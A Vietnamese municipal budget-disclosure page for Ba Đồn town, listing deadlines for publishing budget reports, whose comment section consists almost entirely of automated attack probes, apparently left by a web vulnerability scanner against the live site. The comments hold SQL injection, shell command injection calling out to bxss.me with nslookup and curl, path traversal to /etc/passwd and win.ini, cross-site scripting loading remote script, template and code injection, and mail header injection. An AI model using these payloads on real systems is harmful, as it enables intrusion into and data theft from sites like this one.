UBND TỈNH QUẢNG BÌNH
UBND THỊ XÃ BA ĐỒN
TRANG CÔNG KHAI NGÂN SÁCH UBND THỊ XÃ BA ĐỒN
Thứ năm, 18/07/2024 11:00:05
Dương Trung Đức

Thời điểm công khai báo cáo

1. Báo cáo dự toán ngân sách xã và kế hoạch thu, chi các hoạt động tài chính khác ở xã trình Hội đồng nhân dân cấp xã phải được công khai chậm nhất là 05 ngày làm việc kể từ ngày Ủy ban nhân dân cấp xã gửi đại biểu Hội đồng nhân dân cấp xã.

2. Báo cáo dự toán ngân sách xã và kế hoạch thu, chi các hoạt động tài chính khác ở xã đã được Hội đồng nhân dân cấp xã quyết định, quyết toán ngân sách xã và kết quả thu, chi các hoạt động tài chính khác ở xã đã được Hội đồng nhân dân cấp xã phê chuẩn phải được công khai chậm nhất là 30 ngày, kể từ ngày văn bản được ban hành.

3. Báo cáo tình hình thực hiện ngân sách xã hằng quý, 06 tháng phải được công khai chậm nhất là 15 ngày, kể từ ngày kết thúc quý và 06 tháng.

4. Báo cáo tình hình thực hiện ngân sách xã hằng năm được công khai khi Ủy ban nhân dân cấp xã trình Hội đồng nhân dân cấp xã.

Stt Nội dung công bố Thời điểm công bố
1 Dự toán NSNN trình Hội đồng nhân dân 25/10
2 Dự toán NSNN đã được HĐND quyết định 15/12
3 Tình hình thực hiện NSNN quý I 15/4
4 Tình hình thực hiện NSNN 6 tháng 15/7
5 Tình hình thực hiện NSNN 9 tháng 15/10
6 Đánh giá tình hình thực hiện NSNN lần đầu 25/10
7 Đánh giá bổ sung kết quả thực hiện NSNN 10/6
8 Quyết toán NSNN đã được HĐND phê chuẩn 28/8

2376 Bình luận

image
XcwJRDFY
12/01/2024

1G6MBbmGO

image
1n9ilmVSO
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
dmNHc0Q5REQ=
12/01/2024

1

image
XcwJRDFY
12/01/2024

/../../../../../../../../../../windows/system32/BITSADMIN.exe

image
/../../../../../../../../../../windows/system32/BITSADMIN.exe
12/01/2024

1

image
XcwJRDFY
12/01/2024

response.write(9252157*9056506)

image
XcwJRDFY
12/01/2024

'+response.write(9252157*9056506)+'

image
XcwJRDFY
12/01/2024

"+response.write(9252157*9056506)+"

image
'+response.write(9383524*9964962)+'
12/01/2024

1

image
XcwJRDFY
12/01/2024

../../../../../../../../../../../../../../etc/passwd

image
XcwJRDFY
12/01/2024

../../../../../../../../../../../../../../windows/win.ini

image
XcwJRDFY
12/01/2024

file:///etc/passwd

image
XcwJRDFY
12/01/2024

echo spvzji$()\ tkhlwd\nz^xyu||a #' &echo spvzji$()\ tkhlwd\nz^xyu||a #|" &echo spvzji$()\ tkhlwd\nz^xyu||a #

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

${9999923+9999453}

image
XcwJRDFY
12/01/2024

-1 OR 2+313-313-1=0+0+0+1

image
XcwJRDFY
12/01/2024

|(nslookup -q=cname hitbikpzhvgkr92d3f.bxss.me||curl hitbikpzhvgkr92d3f.bxss.me)

image
XcwJRDFY<esi:include src="http://bxss.me/rpb.png"/>
12/01/2024

1

image
XcwJRDFY
12/01/2024

-1' OR 2+338-338-1=0+0+0+1 --

image
XcwJRDFY
12/01/2024

`(nslookup -q=cname hitzpqygrrzhob71f6.bxss.me||curl hitzpqygrrzhob71f6.bxss.me)`

image
XcwJRDFY
12/01/2024

-1' OR 2+525-525-1=0+0+0+1 or '7773iE1J'='

image
XcwJRDFY
12/01/2024

;(nslookup -q=cname hitskfdmqamag30d49.bxss.me||curl hitskfdmqamag30d49.bxss.me)|(nslookup -q=cname hitskfdmqamag30d49.bxss.me||curl hitskfdmqamag30d49.bxss.me)&(nslookup -q=cname hitskfdmqamag30d49.bxss.me||curl hitskfdmqamag30d49.bxss.me)

image
XcwJRDFY
12/01/2024

-1" OR 2+171-171-1=0+0+0+1 --

image
&echo icqmfw$()\ omdsqa\nz^xyu||a #' &echo icqmfw$()\ omdsqa\nz^xyu||a #|" &echo icqmfw$()\ omdsqa\nz^xyu||a #
12/01/2024

1

image
XcwJRDFY
12/01/2024

if(now()=sysdate(),sleep(15),0)

image
XcwJRDFY
12/01/2024

)

image
|echo udfuvc$()\ nfvjud\nz^xyu||a #' |echo udfuvc$()\ nfvjud\nz^xyu||a #|" |echo udfuvc$()\ nfvjud\nz^xyu||a #
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

!(()&&!|*|*|

image
XcwJRDFY|echo mgcngn$()\ dbswxd\nz^xyu||a #' |echo mgcngn$()\ dbswxd\nz^xyu||a #|" |echo mgcngn$()\ dbswxd\nz^xyu||a #
12/01/2024

1

image
(nslookup -q=cname hitykwwqsevslb0544.bxss.me||curl hitykwwqsevslb0544.bxss.me))
12/01/2024

1

image
XcwJRDFY
12/01/2024

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

image
$(nslookup -q=cname hitmfzxegkdbwbd2d3.bxss.me||curl hitmfzxegkdbwbd2d3.bxss.me)
12/01/2024

1

image
&nslookup -q=cname hitylgsluaojv88b0f.bxss.me&'\"`0&nslookup -q=cname hitylgsluaojv88b0f.bxss.me&`'
12/01/2024

1

image
XcwJRDFY
12/01/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
XcwJRDFY
12/01/2024

c:/windows/win.ini

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

bxss.me

image
;(nslookup -q=cname hitcchdhldnyt970ef.bxss.me||curl hitcchdhldnyt970ef.bxss.me)|(nslookup -q=cname hitcchdhldnyt970ef.bxss.me||curl hitcchdhldnyt970ef.bxss.me)&(nslookup -q=cname hitcchdhldnyt970ef.bxss.me||curl hitcchdhldnyt970ef.bxss.me)
12/01/2024

1

image
/etc/shells
12/01/2024

1

image
XcwJRDFY
12/01/2024

'.gethostbyname(lc('hitiq'.'zkcodxqi7a165.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(65).chr(116).chr(70).'

image
XcwJRDFY
12/01/2024

1 waitfor delay '0:0:15' --

image
XcwJRDFY
12/01/2024

".gethostbyname(lc("hitxd"."qsceokvp0090e.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(76).chr(98).chr(82)."

image
'.gethostbyname(lc('hitho'.'pwkrfolkbfe0e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(73).chr(111).chr(72).'
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

yNdKFVfU'); waitfor delay '0:0:15' --

image
XcwJRDFY
12/01/2024

rJAZtDrO')); waitfor delay '0:0:15' --

image
XcwJRDFY
12/01/2024

'"()

image
XcwJRDFY
12/01/2024

1'&&sleep(27*1000)*bjuimx&&'

image
XcwJRDFY
12/01/2024

-5) OR 606=(SELECT 606 FROM PG_SLEEP(15))--

image
XcwJRDFY
12/01/2024

1"&&sleep(27*1000)*qucual&&"

image
XcwJRDFY
12/01/2024

1'||sleep(27*1000)*wflrnw||'

image
XcwJRDFY
12/01/2024

-1)) OR 762=(SELECT 762 FROM PG_SLEEP(15))--

image
XcwJRDFY
12/01/2024

1"||sleep(27*1000)*tlgicc||"

image
XcwJRDFY
12/01/2024

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

image
XcwJRDFY
12/01/2024

';print(md5(31337));$a='

image
XcwJRDFY
12/01/2024

";print(md5(31337));$a="

image
XcwJRDFY
12/01/2024

mUp8Wojx' OR 534=(SELECT 534 FROM PG_SLEEP(15))--

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

${@print(md5(31337))}

image
XcwJRDFY
12/01/2024

af2jAZed') OR 232=(SELECT 232 FROM PG_SLEEP(15))--

image
XcwJRDFY
12/01/2024

${@print(md5(31337))}\

image
XcwJRDFY
12/01/2024

'.print(md5(31337)).'

image
XcwJRDFY
12/01/2024

Cz7UfHvV')) OR 803=(SELECT 803 FROM PG_SLEEP(15))--

image
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
12/01/2024

1

image
'"()
12/01/2024

1

image
XcwJRDFY
12/01/2024

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

image
';print(md5(31337));$a='
12/01/2024

1

image
XcwJRDFY
12/01/2024

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

image
";print(md5(31337));$a="
12/01/2024

1

image
XcwJRDFY'&&sleep(27*1000)*fsfwre&&'
12/01/2024

1

image
${@print(md5(31337))}
12/01/2024

1

image
XcwJRDFY
12/01/2024

1'"

image
XcwJRDFY"&&sleep(27*1000)*txruti&&"
12/01/2024

1

image
${@print(md5(31337))}\
12/01/2024

1

image
XcwJRDFY'||sleep(27*1000)*tknvpq||'
12/01/2024

1

image
XcwJRDFY
12/01/2024

to@example.com> bcc:0.705-6957.705.74b1d.19734.2@bxss.me

image
'.print(md5(31337)).'
12/01/2024

1

image
XcwJRDFY
12/01/2024

HttP://bxss.me/t/xss.html?%00

image
XcwJRDFY"||sleep(27*1000)*ujnvtf||"
12/01/2024

1

image
XcwJRDFY bcc:0.705-6958.705.74b1d.19734.2@bxss.me
12/01/2024

1

image
XcwJRDFY
12/01/2024

"+"A".concat(70-3).concat(22*4).concat(117).concat(75).concat(100).concat(86)+(require"socket" Socket.gethostbyname("hitje"+"ilrljfaxd761b.bxss.me.")[3].to_s)+"

image
XcwJRDFY
12/01/2024

bxss.me/t/xss.html?%00

image
to@example.com> bcc:0.705-6959.705.74b1d.19734.2@bxss.me
12/01/2024

1

image
HttP://bxss.me/t/xss.html?%00
12/01/2024

1

image
XcwJRDFY
12/01/2024

'+'A'.concat(70-3).concat(22*4).concat(111).concat(83).concat(107).concat(72)+(require'socket' Socket.gethostbyname('hitlx'+'uvjotljg13a46.bxss.me.')[3].to_s)+'

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

@@Cpefa

image
bxss.me/t/xss.html?%00
12/01/2024

1

image
"+"A".concat(70-3).concat(22*4).concat(111).concat(89).concat(110).concat(79)+(require"socket" Socket.gethostbyname("hitsr"+"spfzcvwa0415e.bxss.me.")[3].to_s)+"
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
'+'A'.concat(70-3).concat(22*4).concat(107).concat(90).concat(98).concat(70)+(require'socket' Socket.gethostbyname('hitgp'+'ajuyezwv58229.bxss.me.')[3].to_s)+'
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
e5MdLKm8
12/01/2024

1

image
-1 OR 2+926-926-1=0+0+0+1 --
12/01/2024

1

image
-1 OR 2+764-764-1=0+0+0+1
12/01/2024

1

image
XcwJRDFY
12/01/2024

xfs.bxss.me

image
-1' OR 2+322-322-1=0+0+0+1 --
12/01/2024

1

image
xfs.bxss.me
12/01/2024

1

image
-1' OR 2+707-707-1=0+0+0+1 or 'Np7VLkjq'='
12/01/2024

1

image
XcwJRDFY
12/01/2024

comment

image
XcwJRDFY
12/01/2024

'"

image
-1" OR 2+813-813-1=0+0+0+1 --
12/01/2024

1

image
XcwJRDFY
12/01/2024

comment

image
if(now()=sysdate(),sleep(15),0)
12/01/2024

1

image
XcwJRDFY
12/01/2024

comment/.

image
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
12/01/2024

1

image
'"
12/01/2024

1

image
comment
12/01/2024

1

image
<!--
12/01/2024

1

image
comment/.
12/01/2024

1

image
XcwJRDFY
12/01/2024

1'"()&%<zzz><ScRiPt >j579(9998)</ScRiPt>

image
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
12/01/2024

1

image
1 waitfor delay '0:0:15' --
12/01/2024

1

image
MiVHcZxe'; waitfor delay '0:0:15' --
12/01/2024

1

image
AXamsGVD'); waitfor delay '0:0:15' --
12/01/2024

1

image
m4Deax4H')); waitfor delay '0:0:15' --
12/01/2024

1

image
XcwJRDFY
12/01/2024

'"()&%<zzz><ScRiPt >j579(9815)</ScRiPt>

image
fFythdmj' OR 345=(SELECT 345 FROM PG_SLEEP(15))--
12/01/2024

1

image
EpltInNi') OR 647=(SELECT 647 FROM PG_SLEEP(15))--
12/01/2024

1

image
I6iVMwFz')) OR 868=(SELECT 868 FROM PG_SLEEP(15))--
12/01/2024

1

image
XcwJRDFY
12/01/2024

19014734

image
XcwJRDFY'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
12/01/2024

1

image
@@7nlgb
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

bfg4545<s1﹥s2ʺs3ʹhjl4545

image
XcwJRDFY
12/01/2024

<%={{={@{#{${dfb}}%>

image
XcwJRDFY
12/01/2024

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

image
XcwJRDFY
12/01/2024

dfb{{98991*97996}}xca

image
XcwJRDFY
12/01/2024

dfb[[${98991*97996}]]xca

image
XcwJRDFY
12/01/2024

dfb__${98991*97996}__::.x

image
XcwJRDFY
12/01/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
XcwJRDFY
12/01/2024

19277"();}]9878

image
XcwJRDFY
12/01/2024

1</script><script>j579(9522)</script>

image
'"()&%<zzz><ScRiPt >j579(9804)</ScRiPt>
12/01/2024

1

image
XcwJRDFY9440105
12/01/2024

1

image
<th:t="${dfb}#foreach
12/01/2024

1

image
dfb{{98991*97996}}xca
12/01/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
XcwJRDFY9577"();}]9338
12/01/2024

1

image
%58%63%77%4A%52%44%46%59%39%36%30%33%22%28%29%3B%7D%5D%39%35%32%33
12/01/2024

1

image
XcwJRDFY</script><script>j579(9640)</script>
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
ZW5BU01PY3g=
12/01/2024

1

image
HfjNUlYZ
12/01/2024

'+response.write(9844843*9835802)+'

image
HfjNUlYZ
12/01/2024

"+response.write(9844843*9835802)+"

image
HfjNUlYZ
12/01/2024

/../../../../../../../../../../windows/system32/BITSADMIN.exe

image
response.write(9534695*9873634)
12/01/2024

1

image
"+response.write(9534695*9873634)+"
12/01/2024

1

image
HfjNUlYZ
12/01/2024

XoFnkDvY

image
HfjNUlYZ
12/01/2024

echo enscdm$()\ uewlds\nz^xyu||a #' &echo enscdm$()\ uewlds\nz^xyu||a #|" &echo enscdm$()\ uewlds\nz^xyu||a #

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

-1" OR 2+465-465-1=0+0+0+1 --

image
HfjNUlYZ
12/01/2024

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

image
HfjNUlYZ
12/01/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
file:///etc/passwd
12/01/2024

1

image
HfjNUlYZ
12/01/2024

|echo xeagqs$()\ ekjqdu\nz^xyu||a #' |echo xeagqs$()\ ekjqdu\nz^xyu||a #|" |echo xeagqs$()\ ekjqdu\nz^xyu||a #

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
../HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

)

image
HfjNUlYZ
12/01/2024

-1; waitfor delay '0:0:15' --

image
)
12/01/2024

1

image
HfjNUlYZ
12/01/2024

c:/windows/win.ini

image
HfjNUlYZ
12/01/2024

TmMMNxwM')); waitfor delay '0:0:15' --

image
^(#$!@#$)(()))******
12/01/2024

1

image
HfjNUlYZ
12/01/2024

'"()

image
bxss.me
12/01/2024

1

image
$(nslookup -q=cname hitpvmhqeuqotf568f.bxss.me||curl hitpvmhqeuqotf568f.bxss.me)
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

image
HfjNUlYZ
12/01/2024

".gethostbyname(lc("hitsx"."nxjpgyxh12e18.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(68).chr(120).chr(89)."

image
HfjNUlYZ
12/01/2024

1'&&sleep(27*1000)*shtrpv&&'

image
&nslookup -q=cname hitpsjsgnqyzk8b12a.bxss.me&'\"`0&nslookup -q=cname hitpsjsgnqyzk8b12a.bxss.me&`'
12/01/2024

1

image
'.gethostbyname(lc('hitrd'.'bwjlssqvdb77b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(81).chr(102).chr(87).'
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1'"

image
HfjNUlYZ
12/01/2024

1"&&sleep(27*1000)*wchiaf&&"

image
&(nslookup -q=cname hitfiuccnykkkad3e4.bxss.me||curl hitfiuccnykkkad3e4.bxss.me)&'\"`0&(nslookup -q=cname hitfiuccnykkkad3e4.bxss.me||curl hitfiuccnykkkad3e4.bxss.me)&`'
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1'||sleep(27*1000)*hrmlmv||'

image
HfjNUlYZ
12/01/2024

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

image
".gethostbyname(lc("hitjt"."nsxxteaa50076.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(87).chr(105).chr(69)."
12/01/2024

1

image
|(nslookup -q=cname hitjtbyuwmimz13a2f.bxss.me||curl hitjtbyuwmimz13a2f.bxss.me)
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1"||sleep(27*1000)*jzbovv||"

image
HfjNUlYZ
12/01/2024

';print(md5(31337));$a='

image
HfjNUlYZ
12/01/2024

";print(md5(31337));$a="

image
HfjNUlYZ
12/01/2024

@@BkAw1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1 bcc:0.696-4558.696.f11a7.19734.2@bxss.me

image
HfjNUlYZ
12/01/2024

${@print(md5(31337))}

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

to@example.com> bcc:0.696-4559.696.f11a7.19734.2@bxss.me

image
HfjNUlYZ bcc:0.696-4560.696.f11a7.19734.2@bxss.me
12/01/2024

1

image
HfjNUlYZ
12/01/2024

${@print(md5(31337))}\

image
HfjNUlYZ
12/01/2024

1

image
to@example.com> bcc:0.696-4561.696.f11a7.19734.2@bxss.me
12/01/2024

1

image
HfjNUlYZ
12/01/2024

'.print(md5(31337)).'

image
98rAeRYS
12/01/2024

1

image
HfjNUlYZ"&&sleep(27*1000)*ahwpue&&"
12/01/2024

1

image
";print(md5(31337));$a="
12/01/2024

1

image
-1' OR 2+369-369-1=0+0+0+1 or '0iGipz6W'='
12/01/2024

1

image
-1" OR 2+289-289-1=0+0+0+1 --
12/01/2024

1

image
HfjNUlYZ"||sleep(27*1000)*twusyg||"
12/01/2024

1

image
1 waitfor delay '0:0:15' --
12/01/2024

1

image
"+"A".concat(70-3).concat(22*4).concat(113).concat(79).concat(108).concat(80)+(require"socket" Socket.gethostbyname("hitmc"+"liannoqk0459a.bxss.me.")[3].to_s)+"
12/01/2024

1

image
'+'A'.concat(70-3).concat(22*4).concat(102).concat(69).concat(102).concat(82)+(require'socket' Socket.gethostbyname('hittm'+'iiyrlhole331d.bxss.me.')[3].to_s)+'
12/01/2024

1

image
29thWkeU')); waitfor delay '0:0:15' --
12/01/2024

1

image
comment/.
12/01/2024

1

image
@@oUMB0
12/01/2024

1

image
HfjNUlYZ
12/01/2024

'"()&%<zzz><ScRiPt >6Lz7(9366)</ScRiPt>

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

<%={{={@{#{${dfb}}%>

image
HfjNUlYZ
12/01/2024

dfb[[${98991*97996}]]xca

image
HfjNUlYZ
12/01/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
HfjNUlYZ
12/01/2024

%31%39%32%33%36%22%28%29%3B%7D%5D%39%37%32%31

image
HfjNUlYZ
12/01/2024

1</script><script>6Lz7(9181)</script>

image
'"()&%<zzz><ScRiPt >6Lz7(9146)</ScRiPt>
12/01/2024

1

image
dfb__${98991*97996}__::.x
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
XcwJRDFY
12/01/2024

1'"()&%<zzz><ScRiPt >yym6(9106)</ScRiPt>

image
XcwJRDFY'"()&%<zzz><ScRiPt >E1Ms(9335)</ScRiPt>
12/01/2024

1

image
XcwJRDFY9348281
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
bfg3202<s1﹥s2ʺs3ʹhjl3202
12/01/2024

1

image
XcwJRDFY
12/01/2024

bfg9422<s1﹥s2ʺs3ʹhjl9422

image
XcwJRDFY
12/01/2024

<%={{={@{#{${dfb}}%>

image
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
12/01/2024

1

image
dfb{{98991*97996}}xca
12/01/2024

1

image
XcwJRDFY
12/01/2024

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

image
dfb__${98991*97996}__::.x
12/01/2024

1

image
XcwJRDFY
12/01/2024

dfb[[${98991*97996}]]xca

image
XcwJRDFY
12/01/2024

dfb__${98991*97996}__::.x

image
XcwJRDFY<ScRiPt >E1Ms(9136)</ScRiPt>
12/01/2024

1

image
XcwJRDFY
12/01/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
XcwJRDFY<WKOW26>XN1RW[!+!]</WKOW26>
12/01/2024

1

image
XcwJRDFY
12/01/2024

1<ScRiPt >yym6(9750)</ScRiPt>

image
XcwJRDFY<script>E1Ms(9206)</script>
12/01/2024

1

image
XcwJRDFY
12/01/2024

1<WBTFOZ>HHN9L[!+!]</WBTFOZ>

image
XcwJRDFY<script>E1Ms(9073)</script>9073
12/01/2024

1

image
XcwJRDFY
12/01/2024

1<script>yym6(9732)</script>

image
XcwJRDFY<ScR<ScRiPt>IpT>E1Ms(9675)</sCr<ScRiPt>IpT>
12/01/2024

1

image
XcwJRDFY<ScRiPt >E1Ms(9285)</ScRiPt>
12/01/2024

1

image
XcwJRDFY
12/01/2024

1<ScR<ScRiPt>IpT>yym6(9751)</sCr<ScRiPt>IpT>

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9440></ScRiPt>
12/01/2024

1

image
XcwJRDFY
12/01/2024

1<ScRiPt >yym6(9032)</ScRiPt>

image
XcwJRDFY
12/01/2024

1Cpg0oiIEtO

image
XcwJRDFY
12/01/2024

1

image
1BPVomozzSO
12/01/2024

1

image
XcwJRDFY<ScRiPt >E1Ms(9163)</ScRiPt>
12/01/2024

1

image
XcwJRDFY
12/01/2024

1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9085></ScRiPt>

image
MldDSnNGcmU=
12/01/2024

1

image
XcwJRDFY
12/01/2024

response.write(9081148*9404858)

image
XcwJRDFY
12/01/2024

/../../../../../../../../../../windows/system32/BITSADMIN.exe

image
XcwJRDFY
12/01/2024

'+response.write(9081148*9404858)+'

image
/../../../../../../../../../../windows/system32/BITSADMIN.exe
12/01/2024

1

image
XcwJRDFY<isindex type=image src=1 onerror=E1Ms(9746)>
12/01/2024

1

image
XcwJRDFY
12/01/2024

"+response.write(9081148*9404858)+"

image
response.write(9300908*9591786)
12/01/2024

1

image
'+response.write(9300908*9591786)+'
12/01/2024

1

image
"+response.write(9300908*9591786)+"
12/01/2024

1

image
XcwJRDFY<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9214'>
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY<body onload=E1Ms(9193)>
12/01/2024

1

image
XcwJRDFY
12/01/2024

../../../../../../../../../../../../../../windows/win.ini

image
XcwJRDFY<img src=//xss.bxss.me/t/dot.gif onload=E1Ms(9818)>
12/01/2024

1

image
XcwJRDFY
12/01/2024

1<body onload=yym6(9161)>

image
XcwJRDFY
12/01/2024

file:///etc/passwd

image
XcwJRDFY
12/01/2024

echo bfxion$()\ uczawv\nz^xyu||a #' &echo bfxion$()\ uczawv\nz^xyu||a #|" &echo bfxion$()\ uczawv\nz^xyu||a #

image
XcwJRDFY
12/01/2024

&echo bzkrup$()\ pfsgtr\nz^xyu||a #' &echo bzkrup$()\ pfsgtr\nz^xyu||a #|" &echo bzkrup$()\ pfsgtr\nz^xyu||a #

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1&echo fyxgim$()\ kekgpd\nz^xyu||a #' &echo fyxgim$()\ kekgpd\nz^xyu||a #|" &echo fyxgim$()\ kekgpd\nz^xyu||a #

image
../../../../../../../../../../../../../../windows/win.ini
12/01/2024

1

image
XcwJRDFY<esi:include src="http://bxss.me/rpb.png"/>
12/01/2024

1

image
XcwJRDFY
12/01/2024

$(nslookup -q=cname hitxpdomgvdfdcd552.bxss.me||curl hitxpdomgvdfdcd552.bxss.me)

image
XcwJRDFY
12/01/2024

1

image
file:///etc/passwd
12/01/2024

1

image
XcwJRDFY
12/01/2024

&nslookup -q=cname hituggzfbhxcgd4ca7.bxss.me&'\"`0&nslookup -q=cname hituggzfbhxcgd4ca7.bxss.me&`'

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1<img src=xyz OnErRor=yym6(9675)>

image
XcwJRDFY
12/01/2024

1

image
../XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

&(nslookup -q=cname hitseaanudteu99115.bxss.me||curl hitseaanudteu99115.bxss.me)&'\"`0&(nslookup -q=cname hitseaanudteu99115.bxss.me||curl hitseaanudteu99115.bxss.me)&`'

image
XcwJRDFY<img/src=">" onerror=alert(9581)>
12/01/2024

1

image
XcwJRDFY
12/01/2024

YMsmDuhn

image
XcwJRDFY
12/01/2024

|(nslookup -q=cname hitcmkjjipurmfa36f.bxss.me||curl hitcmkjjipurmfa36f.bxss.me)

image
XcwJRDFY
12/01/2024

${9999892+9999628}

image
XcwJRDFY
12/01/2024

`(nslookup -q=cname hitvuomvcesoi2a848.bxss.me||curl hitvuomvcesoi2a848.bxss.me)`

image
XcwJRDFY
12/01/2024

-1 OR 2+312-312-1=0+0+0+1

image
XcwJRDFY
12/01/2024

;(nslookup -q=cname hitpgbhzzpmsqabec4.bxss.me||curl hitpgbhzzpmsqabec4.bxss.me)|(nslookup -q=cname hitpgbhzzpmsqabec4.bxss.me||curl hitpgbhzzpmsqabec4.bxss.me)&(nslookup -q=cname hitpgbhzzpmsqabec4.bxss.me||curl hitpgbhzzpmsqabec4.bxss.me)

image
${9999478+9999547}
12/01/2024

1

image
echo lnnjgu$()\ dvcmxa\nz^xyu||a #' &echo lnnjgu$()\ dvcmxa\nz^xyu||a #|" &echo lnnjgu$()\ dvcmxa\nz^xyu||a #
12/01/2024

1

image
XcwJRDFY
12/01/2024

-1' OR 2+265-265-1=0+0+0+1 --

image
XcwJRDFY
12/01/2024

1<img/src=">" onerror=alert(9513)>

image
%58%63%77%4A%52%44%46%59%3C%53%63%52%69%50%74%20%3E%45%31%4D%73%289028%29%3C%2F%73%43%72%69%70%54%3E
12/01/2024

1

image
XcwJRDFY
12/01/2024

-1" OR 2+533-533-1=0+0+0+1 --

image
XcwJRDFY&echo yacctv$()\ rykbqy\nz^xyu||a #' &echo yacctv$()\ rykbqy\nz^xyu||a #|" &echo yacctv$()\ rykbqy\nz^xyu||a #
12/01/2024

1

image
|echo dkfwlu$()\ sgvazf\nz^xyu||a #' |echo dkfwlu$()\ sgvazf\nz^xyu||a #|" |echo dkfwlu$()\ sgvazf\nz^xyu||a #
12/01/2024

1

image
XcwJRDFY
12/01/2024

if(now()=sysdate(),sleep(15),0)

image
XcwJRDFY
12/01/2024

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

image
XcwJRDFY|echo zrwevx$()\ oxqazw\nz^xyu||a #' |echo zrwevx$()\ oxqazw\nz^xyu||a #|" |echo zrwevx$()\ oxqazw\nz^xyu||a #
12/01/2024

1

image
XcwJRDFY
12/01/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
(nslookup -q=cname hitgodravmkaqfc102.bxss.me||curl hitgodravmkaqfc102.bxss.me))
12/01/2024

1

image
$(nslookup -q=cname hitiiapmkahxvc23bd.bxss.me||curl hitiiapmkahxvc23bd.bxss.me)
12/01/2024

1

image
XcwJRDFY
12/01/2024

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

image
